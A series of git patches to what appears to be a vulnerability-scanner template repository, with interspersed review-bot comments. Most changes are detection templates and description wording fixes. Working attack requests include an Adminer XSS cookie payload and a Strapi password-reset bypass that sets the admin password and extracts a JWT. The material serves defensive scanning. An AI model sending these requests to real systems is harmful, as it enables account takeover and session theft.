+ - https://www.cvedetails.com/cve/CVE-2021-29625/
+ tags: cve,cve2021,adminer,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%27%3E%3Csvg/onload=alert(document.cookie)%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "'><svg/onload=alert(document.cookie)>"
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: status
+ status:
+ - 200
From 17d55f7a17cac495969d4e9c6350364b06d6aec3 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sun, 5 Sep 2021 15:51:47 +0530 Subject: [PATCH 052/339] misc update --- cves/2019/CVE-2019-18818.yaml | 29 +++++++++++++++++++---------- 1 file changed, 19 insertions(+), 10 deletions(-)
diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml
index 01fceb5e82..bd28bef61f 100644
--- a/cves/2019/CVE-2019-18818.yaml
+++ b/cves/2019/CVE-2019-18818.yaml
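Review bot: The `description:` value is a single plain scalar of roughly 700 characters, which is hard to read in the file and produces a one-line diff on every future wording change. Writing it as a folded block, `description: >-` followed by the same text wrapped at about 100 columns, parses to an identical string and matches the line-length conventions of the other templates in this repository. The same treatment would suit the `path` entry, which also exceeds 100 columns but must stay a single-quoted scalar because of the `{{BaseURL}}` prefix.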
@@ -1,19 +1,25 @@
 id: CVE-2019-18818
 info:
- name: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
+ name: Strapi CMS - Admin password reset (Unauthenticated)
 author: idealphase
 description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
 reference:
+ - https://github.com/advisories/GHSA-6xc2-mj39-q599
 - https://www.exploit-db.com/exploits/50239
 - https://nvd.nist.gov/vuln/detail/CVE-2019-18818
 severity: critical
- tags: cve,cve2019,strapi,rce
+ tags: cve,cve2019,strapi,auth-bypass,intrusive
 requests:
- - method: GET
- path:
- - "{{BaseURL}}/admin/strapiVersion"
+ - raw:
+ - |
+ POST /admin/auth/reset-password HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Content-Type: application/json
+
+ {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
 matchers-condition: and
 matchers:
@@ -28,10 +34,13 @@ requests:
 - type: word
 words:
- - "strapiVersion"
+ - '"username":'
+ - '"email":'
+ - '"jwt":'
 part: body
- - type: word
- words:
- - '3.0.0-beta.17.4'
- part: body
+ extractors:
+ - type: json
+ json:
+ - .user.username
+ - .user.email
\ No newline at end of file
From 7696f9ab3b0ad33fa4c84da4e77a380b00463a77 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sun, 5 Sep 2021 17:23:34 +0530 Subject: [PATCH 053/339] Added login panel detection --- strapi-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+), 0 deletions(-) create mode 100644 strapi-panel.yaml
diff --git a/strapi-panel.yaml b/strapi-panel.yaml new file mode 100644
index 0000000000..ff373e8e4f
--- /dev/null
+++ b/strapi-panel.yaml
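Review bot: The new raw request changes state on the target: a successful run sets the admin password to the literal `SuperStrongPassword1` from the JSON body (the `{"$gt": 0}` code presumably sidesteps the reset-code check), yet `description:` is left as it was and only says Strapi "mishandles password resets". The `intrusive` tag alone does not tell an operator that a match locks the legitimate administrator out and leaves an account with a known password on the instance. Extend the description with one sentence stating the effect, e.g. `This template submits a password reset with a crafted code; on a vulnerable instance it sets the admin password to the value in the request body, so a match means that password is now live on the target.`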
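Review bot: The word matcher in the second hunk lists `'"username":'`, `'"email":'` and `'"jwt":'` without a `condition:`, and nuclei's default for a `words` list is `or`, so any JSON body that happens to contain `"email":` (a validation error, for instance) satisfies it, which is a weak basis for a critical finding. Add `condition: and` directly under the three words so all of them must be present, which is also what the new `.user.username` / `.user.email` extractor paths assume the response carries. The `matchers:` list opens at the end of the first hunk; the matcher entries between the two hunks are not shown here.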
@@ -0,0 +1,23 @@
+id: strapi-panel
+
+info:
+ name: Strapi Login Panel
+ author: idealphase
+ severity: info
+ tags: panel,strapi
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/admin/auth/login'
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "<title>Strapi Admin"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
From 91a059cde71cbbb98b6e822a1f625c79c1c0ce93 Mon Sep 17 00:00:00 2001 From: kali Date: Sun, 5 Sep 2021 08:42:45 -0400 Subject: [PATCH 054/339] Updated via change location of strapi-panel.yaml to proper directory --- strapi-panel.yaml => exposed-panels/strapi-panel.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename strapi-panel.yaml => exposed-panels/strapi-panel.yaml (100%)
diff --git a/strapi-panel.yaml b/exposed-panels/strapi-panel.yaml similarity index 100% rename from strapi-panel.yaml rename to exposed-panels/strapi-panel.yaml
From bf1d6374b23b379c17efd5034430b888464d46da Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 5 Sep 2021 19:22:07 +0530 Subject: [PATCH 055/339] Rename gSOAP-LFl.yaml to vulnerabilities/other/gsoap-lfi.yaml --- gSOAP-LFl.yaml => vulnerabilities/other/gsoap-lfi.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename gSOAP-LFl.yaml => vulnerabilities/other/gsoap-lfi.yaml (100%)
diff --git a/gSOAP-LFl.yaml b/vulnerabilities/other/gsoap-lfi.yaml similarity index 100% rename from gSOAP-LFl.yaml rename to vulnerabilities/other/gsoap-lfi.yaml
From d3a88548e5e368916e57a7e46a708a32206e96cd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 5 Sep 2021 19:23:17 +0530 Subject: [PATCH 056/339] Update and rename CVE-2019-11013.yaml to cves/2019/CVE-2019-11013.yaml --- CVE-2019-11013.yaml => cves/2019/CVE-2019-11013.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename CVE-2019-11013.yaml => cves/2019/CVE-2019-11013.yaml (94%)
diff --git a/CVE-2019-11013.yaml b/cves/2019/CVE-2019-11013.yaml similarity index 94% rename from CVE-2019-11013.yaml rename to cves/2019/CVE-2019-11013.yaml index 680aabcde6..ba86250503 100644 --- a/CVE-2019-11013.yaml +++ b/cves/2019/CVE-2019-11013.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/47301 - tags: cves,lfi,nimble + tags: cve,cve2019,lfi,nimble requests: - method: GET From 63ce5e0b7780513aaa76f238955b4bc27751a2fd Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 5 Sep 2021 22:52:45 +0530 Subject: [PATCH 057/339] Nextcloud templates --- misconfiguration/nextcloud-install.yaml | 28 +++++++++++++++++++++++++ technologies/nextcloud-detect.yaml | 24 +++++++++++++++++++++ 2 files changed, 52 insertions(+) create mode 100644 misconfiguration/nextcloud-install.yaml create mode 100644 technologies/nextcloud-detect.yaml diff --git a/misconfiguration/nextcloud-install.yaml b/misconfiguration/nextcloud-install.yaml new file mode 100644 index 0000000000..a2a87e7bf0 --- /dev/null +++ b/misconfiguration/nextcloud-install.yaml @@ -0,0 +1,28 @@ +id: nextcloud-install + +info: + name: Nextcloud Exposed Installation + author: skeltavik + severity: high + tags: tech,nextcloud,storage + reference: https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '
Create an admin account' + - 'Storage & database' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/nextcloud-detect.yaml b/technologies/nextcloud-detect.yaml new file mode 100644 index 0000000000..9039bfb4a2 --- /dev/null +++ b/technologies/nextcloud-detect.yaml @@ -0,0 +1,24 @@ +id: nextcloud-detect + +info: + name: Nextcloud Detect + author: skeltavik + severity: info + description: Detects Nextcloud + tags: tech,nextcloud,storage + reference: https://nextcloud.com + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/nextcloud/index.php/login' + - '{{BaseURL}}/login' + + redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - 'var nc_lastLogin' From 513f9058f306f498ef4a3c0a3a445860f315a97e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 5 Sep 2021 22:56:47 +0530 Subject: [PATCH 058/339] misc update Co-Authored-By: Bram Ruttens <3391681+skeltavik@users.noreply.github.com> --- technologies/nextcloud-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/nextcloud-detect.yaml b/technologies/nextcloud-detect.yaml index 9039bfb4a2..b46697fb61 100644 --- a/technologies/nextcloud-detect.yaml +++ b/technologies/nextcloud-detect.yaml @@ -12,9 +12,10 @@ requests: - method: GET path: - '{{BaseURL}}' - - '{{BaseURL}}/nextcloud/index.php/login' - '{{BaseURL}}/login' + - '{{BaseURL}}/nextcloud/index.php/login' + stop-at-first-match: true redirects: true max-redirects: 2 matchers: From ef1f7c5e92133362f6e59b96c491cc95ad0993d1 Mon Sep 17 00:00:00 2001 
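Review bot: nextcloud-install is placed under `misconfiguration/` with `severity: high`, but its `tags: tech,nextcloud,storage` line is the same one the sibling detection template uses, so tag-filtered runs will treat an open installation wizard as plain technology detection and misconfiguration runs will skip it; `tags: misconfig,nextcloud,storage` reflects what the template reports. The `info` block also lacks a `description:` while nextcloud-detect has one; a line such as `description: The Nextcloud installation wizard is reachable without authentication, so anyone can complete the setup and create the initial admin account.` states what a match on 'Create an admin account' and 'Storage & database' means.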
From: sullo Date: Sun, 5 Sep 2021 17:13:45 -0400 Subject: [PATCH 059/339] Updates across many templates for clarity, spelling, and grammar. --- cves/2009/CVE-2009-1151.yaml | 4 ++-- cves/2009/CVE-2009-4223.yaml | 2 +- cves/2013/CVE-2013-2251.yaml | 2 +- cves/2016/CVE-2016-5649.yaml | 4 ++-- cves/2017/CVE-2017-15715.yaml | 4 ++-- cves/2017/CVE-2017-18638.yaml | 2 +- cves/2019/CVE-2019-13462.yaml | 2 +- cves/2019/CVE-2019-15107.yaml | 2 +- cves/2019/CVE-2019-2767.yaml | 2 +- cves/2019/CVE-2019-5127.yaml | 2 +- cves/2019/CVE-2019-5418.yaml | 2 +- cves/2020/CVE-2020-11034.yaml | 2 +- cves/2020/CVE-2020-14883.yaml | 2 +- cves/2020/CVE-2020-25213.yaml | 4 ++-- cves/2020/CVE-2020-25540.yaml | 2 +- cves/2020/CVE-2020-26919.yaml | 2 +- cves/2020/CVE-2020-28871.yaml | 2 +- cves/2020/CVE-2020-28976.yaml | 2 +- cves/2020/CVE-2020-5847.yaml | 2 +- cves/2020/CVE-2020-7209.yaml | 2 +- cves/2020/CVE-2020-9402.yaml | 2 +- cves/2020/CVE-2020-9425.yaml | 2 +- cves/2021/CVE-2021-21972.yaml | 2 +- cves/2021/CVE-2021-28854.yaml | 2 +- cves/2021/CVE-2021-33221.yaml | 2 +- default-logins/glpi/glpi-default-credential.yaml | 2 +- dns/mx-service-detector.yaml | 2 +- exposures/files/yarn-lock.yaml | 2 +- fuzzing/iis-shortname.yaml | 2 +- iot/kevinlab-device-detect.yaml | 2 +- iot/xp-webcam.yaml | 4 ++-- miscellaneous/google-floc-disabled.yaml | 2 +- miscellaneous/joomla-htaccess.yaml | 4 ++-- miscellaneous/joomla-manifest-file.yaml | 4 ++-- miscellaneous/moodle-changelog.yaml | 2 +- misconfiguration/aem/aem-userinfo-servlet.yaml | 4 ++-- misconfiguration/exposed-service-now.yaml | 4 ++-- misconfiguration/http-missing-security-headers.yaml | 4 ++-- misconfiguration/laravel-debug-enabled.yaml | 4 ++-- network/deprecated-sshv1-detection.yaml | 2 +- network/mysql-native-cred-bruteforce.yaml | 2 +- network/openssh5.3-detect.yaml | 2 +- vulnerabilities/generic/open-redirect.yaml | 2 +- vulnerabilities/other/couchdb-adminparty.yaml | 2 +- vulnerabilities/other/eyelock-nano-lfd.yaml | 2 +- 
vulnerabilities/other/kevinlab-bems-backdoor.yaml | 2 +- vulnerabilities/other/kevinlab-hems-backdoor.yaml | 4 ++-- vulnerabilities/other/netgear-router-auth-bypass.yaml | 2 +- vulnerabilities/other/sar2html-rce.yaml | 2 +- .../springboot/springboot-actuators-jolokia-xxe.yaml | 4 ++-- workflows/azkaban-workflow.yaml | 4 ++-- workflows/bigip-workflow.yaml | 4 ++-- workflows/lucee-workflow.yaml | 4 ++-- workflows/springboot-workflow.yaml | 6 +++--- workflows/worksite-takeover-workflow.yaml | 4 ++-- 55 files changed, 74 insertions(+), 74 deletions(-) diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index f52b3c3c1a..2837b0aa42 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -4,7 +4,7 @@ info: name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability author: princechaddha severity: high - description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 @@ -33,4 +33,4 @@ requests: - type: regex regex: - - "root:.*:0:0:" \ No newline at end of file + - "root:.*:0:0:" diff --git a/cves/2009/CVE-2009-4223.yaml b/cves/2009/CVE-2009-4223.yaml index 5b336af011..c28fd9c671 100644 --- a/cves/2009/CVE-2009-4223.yaml +++ b/cves/2009/CVE-2009-4223.yaml 
@@ -2,7 +2,7 @@ id: CVE-2009-4223 info: name: KR-Web <= 1.1b2 RFI - description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents. + description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. reference: - https://sourceforge.net/projects/krw/ - https://www.exploit-db.com/exploits/10216 diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index e149113efa..d322c7908c 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -4,7 +4,7 @@ info: name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution author: exploitation,dwisiswant0,alex severity: critical - description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. + description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code. reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html tags: cve,cve2013,rce,struts,apache diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml index 5fa539874d..2238126a04 100644 --- a/cves/2016/CVE-2016-5649.yaml +++ b/cves/2016/CVE-2016-5649.yaml 
@@ -4,7 +4,7 @@ info: name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure author: suman_kar severity: critical - description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface. + description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. tags: cve,cve2016,iot,netgear,router reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 @@ -32,4 +32,4 @@ requests: part: body group: 1 regex: - - 'Success "([a-z]+)"' \ No newline at end of file + - 'Success "([a-z]+)"' diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 78556fb50d..0677931936 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -3,7 +3,7 @@ id: CVE-2017-15715 info: name: Apache Arbitrary File Upload author: geeknik - description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename. + description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename. reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 severity: high tags: cve,cve2017,apache,httpd,fileupload 
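Review bot: The rewritten CVE-2017-15715 description still reads "the expression specified in could match '$'", which is missing the name of the thing the expression is specified in; the upstream advisory wording names the `<FilesMatch>` directive, and the angle brackets look to have been stripped as markup when the text was copied. Restore it as `the expression specified in <FilesMatch> could match '$' to a newline character`; a plain YAML scalar may contain `<`, so no quoting is needed.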
@@ -42,4 +42,4 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_2, "{{randstr_1}}")' \ No newline at end of file + - 'contains(body_2, "{{randstr_1}}")' diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index bf1abb9b15..fc7f16e8cc 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -4,7 +4,7 @@ info: name: Graphite 'graphite.composer.views.send_email' SSRF author: huowuzhao severity: high - description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + description: Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. reference: - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html - https://github.com/graphite-project/graphite-web/issues/2008 diff --git a/cves/2019/CVE-2019-13462.yaml b/cves/2019/CVE-2019-13462.yaml index 7ad030cba0..41c5e358b9 100644 --- a/cves/2019/CVE-2019-13462.yaml +++ b/cves/2019/CVE-2019-13462.yaml 
@@ -5,7 +5,7 @@ info: author: divya_mudgal severity: critical reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/ - description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameter to the /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI. + description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI. tags: cve,cve2019,sqli,lansweeper requests: diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index c04cf98e43..2229b3f142 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -4,7 +4,7 @@ info: name: Webmin <= 1.920 Unauthenticated Remote Command Execution author: bp0lr severity: high - description: An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability. + description: An issue was discovered in Webmin <=1.920. The 'old' parameter in password_change.cgi contains a command injection vulnerability. reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html tags: cve,cve2019,webmin,rce diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml index 0ee815a902..3478b09508 100644 --- a/cves/2019/CVE-2019-2767.yaml +++ b/cves/2019/CVE-2019-2767.yaml 
@@ -4,7 +4,7 @@ info: name: Oracle Business Intelligence - Publisher XXE author: madrobot severity: high - description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). + description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 diff --git a/cves/2019/CVE-2019-5127.yaml b/cves/2019/CVE-2019-5127.yaml index f0951986e7..d283867419 100644 --- a/cves/2019/CVE-2019-5127.yaml +++ b/cves/2019/CVE-2019-5127.yaml 
@@ -4,7 +4,7 @@ info: name: YouPHPTube Encoder RCE author: pikpikcu severity: critical - description: A command injection have been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. + description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917 tags: cve,cve2019,rce diff --git a/cves/2019/CVE-2019-5418.yaml b/cves/2019/CVE-2019-5418.yaml index 5639b9366a..b6a5302242 100644 --- a/cves/2019/CVE-2019-5418.yaml +++ b/cves/2019/CVE-2019-5418.yaml @@ -4,7 +4,7 @@ info: name: File Content Disclosure on Rails author: omarkurt severity: medium - description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed. + description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index 126476f33d..c43c5b0539 100644 
--- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -4,7 +4,7 @@ info: name: GLPI v.9.4.6 - Open redirect author: pikpikcu severity: low - description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6. + description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/archive/9.4.6.zip diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml index 84fa26ca9a..9deaa4c983 100644 --- a/cves/2020/CVE-2020-14883.yaml +++ b/cves/2020/CVE-2020-14883.yaml @@ -4,7 +4,7 @@ info: name: Oracle WebLogic Server Administration Console Handle RCE author: pdteam severity: critical - description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 tags: cve,cve2020,oracle,rce,weblogic 
diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index 987eee7315..88ec587026 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -4,7 +4,7 @@ info: name: WP File Manager RCE author: foulenzer severity: critical - description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability. + description: The vulnerability allows unauthenticated remote attackers to upload .php files. This template only detects the plugin, not its vulnerability. reference: - https://plugins.trac.wordpress.org/changeset/2373068 - https://github.com/w4fz5uck5/wp-file-manager-0day @@ -61,4 +61,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml index 92402a073f..822c9f5ef4 100644 --- a/cves/2020/CVE-2020-25540.yaml +++ b/cves/2020/CVE-2020-25540.yaml @@ -4,7 +4,7 @@ info: name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) author: geeknik severity: medium - description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter. + description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. reference: https://www.exploit-db.com/exploits/48812 tags: cve,cve2020,thinkadmin,lfi diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index cc1e8636a0..8381e16ece 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml 
@@ -4,7 +4,7 @@ info: name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. + description: NETGEAR ProSAFE Plus was found to allow any HTML page as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 2ce50c5cfa..4e77e68e53 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml 
@@ -4,7 +4,7 @@ info: name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. + description: This template detects a remote code execution (RCE) vulnerability in Monitorr 1.7.6m. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 00e084429e..3ecd474e88 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -4,7 +4,7 @@ info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter severity: high - description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. + description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 
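Review bot: The Monitorr description keeps the fragment "An unauthorized attacker with web access to could upload", which is missing its object and is exactly the kind of slip this commit sets out to fix; "within the Monitorr" at the end is also off. Suggested wording: `An unauthorized attacker with web access to the application could upload and execute a specially crafted file, leading to remote code execution within Monitorr.`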
